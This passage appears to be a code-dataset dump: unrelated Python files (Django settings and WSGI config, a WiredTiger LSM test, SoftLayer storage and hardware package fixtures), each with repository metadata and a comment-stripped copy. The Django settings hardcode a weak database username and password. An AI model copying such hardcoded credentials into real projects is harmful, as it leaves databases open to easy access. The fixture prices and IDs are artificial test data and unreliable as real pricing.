'NAME': 'yard', # Or path to database file if using sqlite3.
'USER': 'frankie', # Not used with sqlite3.
'PASSWORD': 'frankie', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
DOCS_URL = BASE_DIR + '/yard/static/docs/'
LOGGING = {
'version': 1,
}
LOGIN_REDIRECT_URL="/"
| true
| true
|
f705af023850008c9327aaee200ad9ea7dc63b24
| 405
|
py
|
Python
|
config/wsgi.py
|
bertini36/boatsandjoy-api
|
b22d82eb02947218d924b381160d622ded9e1d98
|
[
"MIT"
] | null | null | null |
config/wsgi.py
|
bertini36/boatsandjoy-api
|
b22d82eb02947218d924b381160d622ded9e1d98
|
[
"MIT"
] | 12
|
2021-04-08T21:18:37.000Z
|
2022-03-12T00:39:39.000Z
|
config/wsgi.py
|
bertini36/boatsandjoy-api
|
b22d82eb02947218d924b381160d622ded9e1d98
|
[
"MIT"
] | null | null | null |
"""
WSGI config for Boats & Joy project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.production')
application = get_wsgi_application()
| 23.823529
| 78
| 0.782716
|
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.production')
application = get_wsgi_application()
| true
| true
|
f705b09b0a46fccb8f3405bc8e17fc8dd4cacc82
| 3,609
|
py
|
Python
|
src/third_party/wiredtiger/test/suite/test_lsm01.py
|
mwhudson/mongo
|
914bbbd26a686e032fdddec964b109ea78c6e6f6
|
[
"Apache-2.0"
] | 14
|
2019-01-11T05:01:29.000Z
|
2021-11-01T00:39:46.000Z
|
src/third_party/wiredtiger/test/suite/test_lsm01.py
|
mwhudson/mongo
|
914bbbd26a686e032fdddec964b109ea78c6e6f6
|
[
"Apache-2.0"
] | 1
|
2022-03-05T02:55:28.000Z
|
2022-03-05T05:28:00.000Z
|
src/third_party/wiredtiger/test/suite/test_lsm01.py
|
mwhudson/mongo
|
914bbbd26a686e032fdddec964b109ea78c6e6f6
|
[
"Apache-2.0"
] | 7
|
2019-02-08T16:28:36.000Z
|
2021-05-08T14:25:47.000Z
|
#!/usr/bin/env python
#
# Public Domain 2014-2016 MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import wiredtiger, wtscenario, wttest
from wtdataset import SimpleDataSet
# test_lsm01.py
# Test LSM tree configuration options.
class test_lsm01(wttest.WiredTigerTestCase):
K = 1024
M = 1024 * K
G = 1024 * M
uri = "lsm:test_lsm01"
chunk_size_scenarios = wtscenario.quick_scenarios('s_chunk_size',
[1*M,20*M,None], [0.6,0.6,0.6])
merge_max_scenarios = wtscenario.quick_scenarios('s_merge_max',
[2,10,20,None], None)
bloom_scenarios = wtscenario.quick_scenarios('s_bloom',
[True,False,None], None)
bloom_bit_scenarios = wtscenario.quick_scenarios('s_bloom_bit_count',
[2,8,20,None], None)
bloom_hash_scenarios = wtscenario.quick_scenarios('s_bloom_hash_count',
[2,10,20,None], None)
# Occasionally add a lot of records, so that merges (and bloom) happen.
record_count_scenarios = wtscenario.quick_scenarios(
'nrecs', [10, 10000], [0.9, 0.1])
config_vars = [ 'chunk_size', 'merge_max', 'bloom',
'bloom_bit_count', 'bloom_hash_count' ]
scenarios = wtscenario.make_scenarios(
chunk_size_scenarios, merge_max_scenarios, bloom_scenarios,
bloom_bit_scenarios, bloom_hash_scenarios, record_count_scenarios,
prune=100, prunelong=500)
# Test drop of an object.
def test_lsm(self):
args = 'key_format=S'
args += ',lsm=(' # Start the LSM configuration options.
# add names to args, e.g. args += ',session_max=30'
for var in self.config_vars:
value = getattr(self, 's_' + var)
if value != None:
if var == 'verbose':
value = '[' + str(value) + ']'
if value == True:
value = 'true'
if value == False:
value = 'false'
args += ',' + var + '=' + str(value)
args += ')' # Close the LSM configuration option group
self.verbose(3,
'Test LSM with config: ' + args + ' count: ' + str(self.nrecs))
SimpleDataSet(self, self.uri, self.nrecs).populate()
# TODO: Adding an explicit drop here can cause deadlocks, if a merge
# is still happening. See issue #349.
# self.session.drop(self.uri)
if __name__ == '__main__':
wttest.run()
| 41.011364
| 76
| 0.665281
|
import wiredtiger, wtscenario, wttest
from wtdataset import SimpleDataSet
class test_lsm01(wttest.WiredTigerTestCase):
K = 1024
M = 1024 * K
G = 1024 * M
uri = "lsm:test_lsm01"
chunk_size_scenarios = wtscenario.quick_scenarios('s_chunk_size',
[1*M,20*M,None], [0.6,0.6,0.6])
merge_max_scenarios = wtscenario.quick_scenarios('s_merge_max',
[2,10,20,None], None)
bloom_scenarios = wtscenario.quick_scenarios('s_bloom',
[True,False,None], None)
bloom_bit_scenarios = wtscenario.quick_scenarios('s_bloom_bit_count',
[2,8,20,None], None)
bloom_hash_scenarios = wtscenario.quick_scenarios('s_bloom_hash_count',
[2,10,20,None], None)
record_count_scenarios = wtscenario.quick_scenarios(
'nrecs', [10, 10000], [0.9, 0.1])
config_vars = [ 'chunk_size', 'merge_max', 'bloom',
'bloom_bit_count', 'bloom_hash_count' ]
scenarios = wtscenario.make_scenarios(
chunk_size_scenarios, merge_max_scenarios, bloom_scenarios,
bloom_bit_scenarios, bloom_hash_scenarios, record_count_scenarios,
prune=100, prunelong=500)
def test_lsm(self):
args = 'key_format=S'
args += ',lsm=('
for var in self.config_vars:
value = getattr(self, 's_' + var)
if value != None:
if var == 'verbose':
value = '[' + str(value) + ']'
if value == True:
value = 'true'
if value == False:
value = 'false'
args += ',' + var + '=' + str(value)
args += ')'
self.verbose(3,
'Test LSM with config: ' + args + ' count: ' + str(self.nrecs))
SimpleDataSet(self, self.uri, self.nrecs).populate()
if __name__ == '__main__':
wttest.run()
| true
| true
|
f705b0edb87ae2c78f1229ba615f3eb737a2e382
| 68,829
|
py
|
Python
|
SoftLayer/fixtures/SoftLayer_Product_Package.py
|
kz6fittycent/softlayer-python
|
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
|
[
"MIT"
] | null | null | null |
SoftLayer/fixtures/SoftLayer_Product_Package.py
|
kz6fittycent/softlayer-python
|
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
|
[
"MIT"
] | null | null | null |
SoftLayer/fixtures/SoftLayer_Product_Package.py
|
kz6fittycent/softlayer-python
|
79a06c38bb48bb4d9712fec2d50ec26a7b2e2d72
|
[
"MIT"
] | null | null | null |
# pylint: skip-file
HARDWARE_ITEMS = [
{'attributes': [],
'capacity': '999',
'description': 'Unknown',
'itemCategory': {'categoryCode': 'unknown', 'id': 325},
'keyName': 'UNKNOWN',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1245172,
"locationGroupId": '',
'itemId': 935954,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '64',
'description': '1 IPv6 Address',
'itemCategory': {'categoryCode': 'pri_ipv6_addresses',
'id': 325},
'keyName': '1_IPV6_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
"locationGroupId": '',
'itemId': 4097,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '10',
'description': '10 Mbps Public & Private Network Uplinks',
'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 272,
"locationGroupId": '',
'itemId': 186,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 5}]},
{'attributes': [],
'capacity': '0',
'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
'itemCategory': {'categoryCode': 'os', 'id': 12},
'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 37650,
"locationGroupId": '',
'itemId': 4702,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 9}],
'softwareDescription': {'id': 1362,
'longDescription': 'Ubuntu / 14.04-64',
'referenceCode': 'UBUNTU_14_64'}},
{'attributes': [],
'capacity': '1',
'description': '1 IP Address',
'itemCategory': {'categoryCode': 'pri_ip_addresses', 'id': 13},
'keyName': '1_IP_ADDRESS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 21,
"locationGroupId": '',
'itemId': 15,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [{'attributeTypeKeyName': 'RECLAIM_BYPASS',
'id': 1014}],
'description': 'Unlimited SSL VPN Users',
'itemCategory': {'categoryCode': 'vpn_management', 'id': 31},
'keyName': 'SSL_VPN_USERS_1_PPTP_VPN_USER_PER_ACCOUNT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 420,
"locationGroupId": '',
'itemId': 309,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'description': 'Reboot / KVM over IP',
'itemCategory': {'categoryCode': 'remote_management',
'id': 46},
'keyName': 'REBOOT_KVM_OVER_IP',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 906,
"locationGroupId": '',
'itemId': 504,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'id': 22505,
"locationGroupId": '',
'itemId': 4481,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 98}]},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB_2',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1800,
"locationGroupId": '',
'itemId': 439,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 99}]}]
ENTERPRISE_PACKAGE = {
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 240,
'name': 'Endurance',
'items': [
{
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_service_enterprise'},
'keyName': 'CODENAME_PRIME_STORAGE_SERVICE',
'prices': [
{
'categories': [
{'categoryCode': 'storage_service_enterprise'}
],
'id': 45058,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_file'},
'keyName': 'FILE_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_file'}
],
'id': 45108,
'locationGroupId': ''
}
]
}, {
'capacity': '0',
'itemCategory': {'categoryCode': 'storage_block'},
'keyName': 'BLOCK_STORAGE_2',
'prices': [
{
'categories': [
{'categoryCode': 'storage_block'}
],
'id': 45098,
'locationGroupId': ''
}
]
}, {
'capacity': '10',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '10_GB_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46160,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 46170,
'locationGroupId': ''
}
]
}, {
'capacity': '20',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'storage_snapshot_space'}
],
'id': 45860,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46659,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '200',
'capacityRestrictionMinimum': '200',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45128,
'locationGroupId': ''
}
]
}, {
'capacity': '1000',
'itemCategory': {'categoryCode': 'performance_storage_space'},
'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
'prices': [
{
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_replication'}
],
'id': 46789,
'locationGroupId': ''
}, {
'capacityRestrictionMaximum': '300',
'capacityRestrictionMinimum': '300',
'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
'categories': [
{'categoryCode': 'performance_storage_space'}
],
'id': 45318,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '300'}
],
'capacity': '300',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'WRITEHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45088,
'locationGroupId': ''
}
]
}, {
'attributes': [
{'value': '200'}
],
'capacity': '200',
'itemCategory': {'categoryCode': 'storage_tier_level'},
'keyName': 'READHEAVY_TIER',
'prices': [
{
'categories': [
{'categoryCode': 'storage_tier_level'}
],
'id': 45078,
'locationGroupId': ''
}
]
}
]
}
# Fixture: legacy "Performance" product package (package id 222) as returned by
# the SoftLayer_Product_Package service. Covers iSCSI/NFS performance storage,
# two storage-space sizes, and two IOPS items with STORAGE_SPACE capacity
# restrictions. Empty-string 'locationGroupId' denotes a standard (non-location
# -specific) price in the XML-RPC transport fixtures.
PERFORMANCE_PACKAGE = {
    'categories': [
        {'categoryCode': 'performance_storage_iscsi'},
        {'categoryCode': 'performance_storage_nfs'}
    ],
    'id': 222,
    'name': 'Performance',
    'items': [
        {
            'capacity': '0',
            'itemCategory': {'categoryCode': 'performance_storage_iscsi'},
            'keyName': 'BLOCK_STORAGE_PERFORMANCE_ISCSI',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'performance_storage_iscsi'}
                    ],
                    'id': 40672,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'itemCategory': {'categoryCode': 'performance_storage_nfs'},
            'keyName': 'FILE_STORAGE_PERFORMANCE_NFS',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'performance_storage_nfs'}
                    ],
                    'id': 40662,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '20',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '20_GB_PERFORMANCE_STORAGE_SPACE',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'id': 40682,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '1000',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '1000_GB_PERFORMANCE_STORAGE_SPACE',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'id': 40742,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '800',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'keyName': '800_IOPS_4',
            'prices': [
                {
                    # IOPS price valid only for volumes of 100-1000 GB.
                    'capacityRestrictionMaximum': '1000',
                    'capacityRestrictionMinimum': '100',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 41562,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '1000',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'keyName': '1000_IOPS',
            'prices': [
                {
                    # IOPS price valid only for exactly 20 GB volumes.
                    'capacityRestrictionMaximum': '20',
                    'capacityRestrictionMinimum': '20',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 40882,
                    'locationGroupId': ''
                }
            ]
        }
    ]
}
# Fixture: "Storage As A Service (StaaS)" product package (package id 759).
# Contains the base service/block/file items, storage-space tiers selected by
# capacity range (keyName like '500_999_GBS'), IOPS items restricted by
# STORAGE_SPACE, tier-level items (200 = READHEAVY, 300 = WRITEHEAVY), snapshot
# space restricted either by IOPS or by STORAGE_TIER_LEVEL, and replication
# items for IOPS-based and tier-based volumes.
SAAS_PACKAGE = {
    'categories': [
        {'categoryCode': 'storage_as_a_service'}
    ],
    'id': 759,
    'name': 'Storage As A Service (StaaS)',
    'items': [
        {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'id': 189433,
                    'categories': [
                        {'categoryCode': 'storage_as_a_service'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_block'}
                    ],
                    'id': 189443,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_file'}
                    ],
                    'id': 189453,
                    'locationGroupId': ''
                }
            ]
        }, {
            # Storage-space item chosen when the requested size is 500-999 GB.
            'capacity': '0',
            'capacityMaximum': '999',
            'capacityMinimum': '500',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '500_999_GBS',
            'prices': [
                {
                    'id': 189993,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            # Storage-space item chosen when the requested size is 1000-1999 GB.
            'capacity': '0',
            'capacityMaximum': '1999',
            'capacityMinimum': '1000',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '1000_1999_GBS',
            'prices': [
                {
                    'id': 190113,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '12000',
            'capacityMinimum': '1',
            'keyName': 'STORAGE_SPACE_FOR_2_IOPS_PER_GB',
            'prices': [
                {
                    'id': 193433,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '12000',
            'capacityMinimum': '1',
            'keyName': 'STORAGE_SPACE_FOR_4_IOPS_PER_GB',
            'prices': [
                {
                    'id': 194763,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            # IOPS item whose price applies to 500-999 GB volumes.
            'capacity': '0',
            'capacityMaximum': '10000',
            'capacityMinimum': '100',
            'keyName': '',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'prices': [
                {
                    'capacityRestrictionMaximum': '999',
                    'capacityRestrictionMinimum': '500',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 190053,
                    'locationGroupId': ''
                }
            ]
        }, {
            # IOPS item whose price applies to 1000-1999 GB volumes.
            'capacity': '0',
            'capacityMaximum': '20000',
            'capacityMinimum': '100',
            'keyName': '',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'prices': [
                {
                    'capacityRestrictionMaximum': '1999',
                    'capacityRestrictionMinimum': '1000',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 190173,
                    'locationGroupId': ''
                }
            ]
        }, {
            # Endurance tier level 200 (2 IOPS/GB).
            'capacity': '200',
            'itemCategory': {'categoryCode': 'storage_tier_level'},
            'keyName': '',
            'prices': [
                {
                    'id': 193373,
                    'categories': [
                        {'categoryCode': 'storage_tier_level'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            # Endurance tier level 300 (4 IOPS/GB).
            'capacity': '300',
            'itemCategory': {'categoryCode': 'storage_tier_level'},
            'keyName': '',
            'prices': [
                {
                    'id': 194703,
                    'categories': [
                        {'categoryCode': 'storage_tier_level'}
                    ],
                    'locationGroupId': ''
                }
            ]
        }, {
            # 10 GB snapshot space: one price keyed by IOPS restriction, two by
            # storage tier level (200 and 300).
            'capacity': '10',
            'keyName': '',
            'prices': [
                {
                    'capacityRestrictionMaximum': '48000',
                    'capacityRestrictionMinimum': '100',
                    'capacityRestrictionType': 'IOPS',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 191193,
                    'locationGroupId': ''
                }, {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 193613,
                    'locationGroupId': ''
                }, {
                    'capacityRestrictionMaximum': '300',
                    'capacityRestrictionMinimum': '300',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 194943,
                    'locationGroupId': ''}]
        }, {
            'capacity': '20',
            'keyName': '',
            'prices': [
                {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 193853,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'itemCategory': {
                'categoryCode': 'performance_storage_replication'
            },
            'keyName': 'REPLICATION_FOR_IOPSBASED_PERFORMANCE',
            'prices': [
                {
                    'capacityRestrictionMaximum': '48000',
                    'capacityRestrictionMinimum': '1',
                    'capacityRestrictionType': 'IOPS',
                    'categories': [
                        {'categoryCode': 'performance_storage_replication'}
                    ],
                    'id': 192033,
                    'locationGroupId': ''
                }
            ]
        }, {
            'capacity': '0',
            'itemCategory': {
                'categoryCode': 'performance_storage_replication'
            },
            'keyName': 'REPLICATION_FOR_TIERBASED_PERFORMANCE',
            'prices': [
                {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'performance_storage_replication'}
                    ],
                    'id': 194693,
                    'locationGroupId': ''
                }
            ]
        }
    ]
}
# Fixture: the same StaaS package (id 759) as SAAS_PACKAGE, but as returned by
# the REST transport, where absent location groups come back as JSON null
# (Python None) instead of the XML-RPC empty string. Only a subset of the
# items is reproduced here.
SAAS_REST_PACKAGE = {
    'categories': [
        {'categoryCode': 'storage_as_a_service'}
    ],
    'id': 759,
    'name': 'Storage As A Service (StaaS)',
    'items': [
        {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'id': 189433,
                    'categories': [
                        {'categoryCode': 'storage_as_a_service'}
                    ],
                    'locationGroupId': None
                }
            ]
        }, {
            'capacity': '20',
            'keyName': '',
            'prices': [
                {
                    'capacityRestrictionMaximum': '200',
                    'capacityRestrictionMinimum': '200',
                    'capacityRestrictionType': 'STORAGE_TIER_LEVEL',
                    'categories': [
                        {'categoryCode': 'storage_snapshot_space'}
                    ],
                    'id': 193853,
                    'locationGroupId': None
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '1999',
            'capacityMinimum': '1000',
            'itemCategory': {'categoryCode': 'performance_storage_space'},
            'keyName': '1000_1999_GBS',
            'prices': [
                {
                    'id': 190113,
                    'categories': [
                        {'categoryCode': 'performance_storage_space'}
                    ],
                    'locationGroupId': None
                }
            ]
        }, {
            'capacity': '0',
            'capacityMaximum': '20000',
            'capacityMinimum': '100',
            'keyName': '',
            'itemCategory': {'categoryCode': 'performance_storage_iops'},
            'prices': [
                {
                    'capacityRestrictionMaximum': '1999',
                    'capacityRestrictionMinimum': '1000',
                    'capacityRestrictionType': 'STORAGE_SPACE',
                    'categories': [
                        {'categoryCode': 'performance_storage_iops'}
                    ],
                    'id': 190173,
                    'locationGroupId': None
                }
            ]
        }, {
            'capacity': '0',
            'keyName': '',
            'prices': [
                {
                    'categories': [
                        {'categoryCode': 'storage_file'}
                    ],
                    'id': 189453,
                    'locationGroupId': None
                }
            ]
        }
    ]
}
# Fixture: an active server preset for the Bare Metal Server package (200);
# referenced below in getAllObjects['activePresets'].
activePreset1 = {
    'description': 'Single Xeon 1270, 8GB Ram, 2x1TB SATA disks, Non-RAID',
    'id': 64,
    'isActive': '1',
    'keyName': 'S1270_8GB_2X1TBSATA_NORAID',
    'name': 'S1270 8GB 2X1TBSATA NORAID',
    'packageId': 200,
    'prices': [
        {
            "hourlyRecurringFee": "1.18",
            "id": 165711,
            "locationGroupId": '',
            "recurringFee": "780",
        }
    ]
}
# Fixture: an account-restricted preset for package 200; referenced below in
# getAllObjects['accountRestrictedActivePresets']. Shares price id 165711 with
# activePreset1.
activePreset2 = {
    'description': 'Dual Xeon Gold, 384GB Ram, 4x960GB SSD, RAID 10',
    'id': 65,
    'isActive': '1',
    'keyName': 'DGOLD_6140_384GB_4X960GB_SSD_SED_RAID_10',
    'name': 'DGOLD 6140 384GB 4X960GB SSD SED RAID 10',
    'packageId': 200,
    'prices': [
        {
            "hourlyRecurringFee": "1.18",
            "id": 165711,
            "locationGroupId": '',
            "recurringFee": "780",
        }
    ]
}
# Fixture: SoftLayer_Product_Package::getAllObjects response for the
# Bare Metal Server package (id 200). 'items' reuses the HARDWARE_ITEMS
# fixture defined elsewhere in this module; 'itemPrices' mixes standard
# (locationGroupId '') and location-group-specific (505/507) prices.
getAllObjects = [{
    'activePresets': [activePreset1],
    'accountRestrictedActivePresets': [activePreset2],
    'description': 'Bare Metal Server',
    'firstOrderStepId': 1,
    'id': 200,
    'isActive': 1,
    'items': HARDWARE_ITEMS,
    'name': 'Bare Metal Server',
    'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
                 'keyname': 'WASHINGTON_DC',
                 'location': {'location': {'id': 37473,
                                           'longName': 'Washington 1',
                                           'name': 'wdc01'}},
                 'sortOrder': 10}],
    'subDescription': 'Bare Metal Server',
    'unitSize': 1,
    "itemPrices": [
        {
            "hourlyRecurringFee": ".027",
            "id": 205911,
            "laborFee": "0",
            "locationGroupId": 505,
            "capacityRestrictionMaximum": "40",
            "capacityRestrictionMinimum": "40",
            "capacityRestrictionType": "CORE",
            "item": {
                "capacity": "0",
                "description": "Load Balancer Uptime",
                "id": 10785,
                "keyName": "LOAD_BALANCER_UPTIME",
            }
        },
        {
            "hourlyRecurringFee": "0",
            "id": 199467,
            "laborFee": "0",
            "locationGroupId": '',
            "recurringFee": "0",
            "item": {
                "capacity": "0",
                "description": "Load Balancer Bandwidth",
                "id": 10051,
                "keyName": "LOAD_BALANCER_BANDWIDTH",
            }
        },
        {
            "hourlyRecurringFee": ".028",
            "id": 205913,
            "laborFee": "0",
            "locationGroupId": 507,
            "item": {
                "capacity": "0",
                "description": "Load Balancer Uptime",
                "id": 10785,
                "keyName": "LOAD_BALANCER_UPTIME",
            }
        }]
}]
# Fixture: SoftLayer_Product_Package::getItems response — a grab bag of
# orderable items (port speeds, RAM, cores, iSCSI storage/snapshots, portable
